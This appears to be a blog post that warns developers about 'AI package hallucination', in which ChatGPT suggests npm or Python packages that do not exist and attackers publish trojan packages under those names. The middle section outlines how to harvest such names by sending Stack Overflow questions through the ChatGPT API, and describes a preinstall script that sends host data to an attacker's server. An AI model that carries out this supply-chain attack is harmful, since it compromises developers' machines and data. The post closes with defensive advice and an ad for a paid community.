Recently, I came across a very clever attack method using ChatGPT, and I would like to share it with everyone as a reminder.
Regardless of whether you understand technology, I recommend that you familiarize yourself with this attack method, as it is better to be prepared.
As we all know, current large language models tend to exhibit hallucinations to some extent when providing answers. The so-called hallucination refers to the AI fabricating non-existent content in a serious manner.
When you learn unfamiliar knowledge through AI, you often trust the content of the answers without question, particularly the various links provided by the AI.
This actually hides a huge risk.
For example, a developer asks ChatGPT to call a certain Python crawler installation package and provides a code example.
At this point, due to the outdated training data of the large language model, combined with AI hallucinations, its answer may contain links to installation packages that do not exist.
If a hacker wants to exploit these links for malicious purposes, they only need to identify which links do not exist, then register the domain names and quietly replace them with their own trojan tools.
As a result, when ChatGPT returns the installation package address in its next answer, it will include the address of the trojan tool provided by the hacker. If the user runs this code locally, it could lead to personal privacy data leakage!
This new type of attack method that exploits malicious installation packages is called “AI Package Hallucination“.
It captures the sources, links, blogs, and statistics that appear in AI hallucinations, and uses ChatGPT as an existing dissemination channel to crazily manufacture and spread various viral data.
So, how can we find those non-existent installation packages recommended by ChatGPT?
Since the advent of ChatGPT, many people no longer use Stack Overflow to solve programming problems; when a program reports an error, their first reaction is to ask ChatGPT how to resolve that error message.
Utilizing this characteristic, we can first crawl frequently asked questions on the Stack Overflow website, then call the ChatGPT API to pass these questions to it and extract answers.
After narrowing down the scope step by step, we find that the question format “How to xxx” is the most common on Stack Overflow.
We interact with ChatGPT using this method and store the conversation content locally. Then, we use a script to identify and extract the non-existent installation package links from the answers.
The final experimental result shows that when asking ChatGPT about Node.js related technical questions, out of more than 200 questions, we obtained over 50 unpublished NPM installation packages. For Python, out of 227 questions, we obtained over 100 unpublished installation packages.
Here, we take the Node.js installation package arangodb as an example to reproduce the entire attack process.
First, we ask ChatGPT:
How to integrate the arangodb installation package in Node.js, please provide the npm install method.
Next, we ask a second question:Please provide more NPM package installation solutions
Then, NPM will provide a non-existent installation package:
At this point, if we have created a trojan installation package and published it on NPM.
When users call the installation package, during the pre-installation phase, it executes the command node index.js.
In the index.js file, we can include various execution scripts, such as obtaining the user’s device hostname, module file directory address, etc., and collect this information to send it to our server.
Through this method, we can implement our entire information collection process. During this process, if users do not use packet capture programs or read the code, it is actually very difficult to discover the hidden tricks.
To be honest, as long as LLM hallucinations exist, we can exploit these vulnerabilities to explore many unimaginable attack methods.
The best way is not to fully trust the information returned by AI; when it recommends an installation package, first search online for the package’s release date, GitHub stars, download counts, etc.
Be cautious, as carelessness can give hackers an opportunity.
However, from the perspective of network security offense and defense, the ingenuity of this attack method is indeed astonishing.
END
Unheard Code·Knowledge Planet is now open!
One-on-one Q&A for crawler-related questions
Career consulting
Interview experience sharing
Weekly live sharing
…
Unheard Code·Knowledge Planet looks forward to meeting you~
Employees of first and second-tier companies
Programming veterans with over ten years of experience
Students from domestic and foreign universities
Newcomers just starting in primary and secondary schools
We are waiting for you in the “Unheard Code Technical Exchange Group”!
How to join: Add WeChat “mekingname” and note “fan group” (No advertisements, serious inquiries only!)
Share good articles with friends~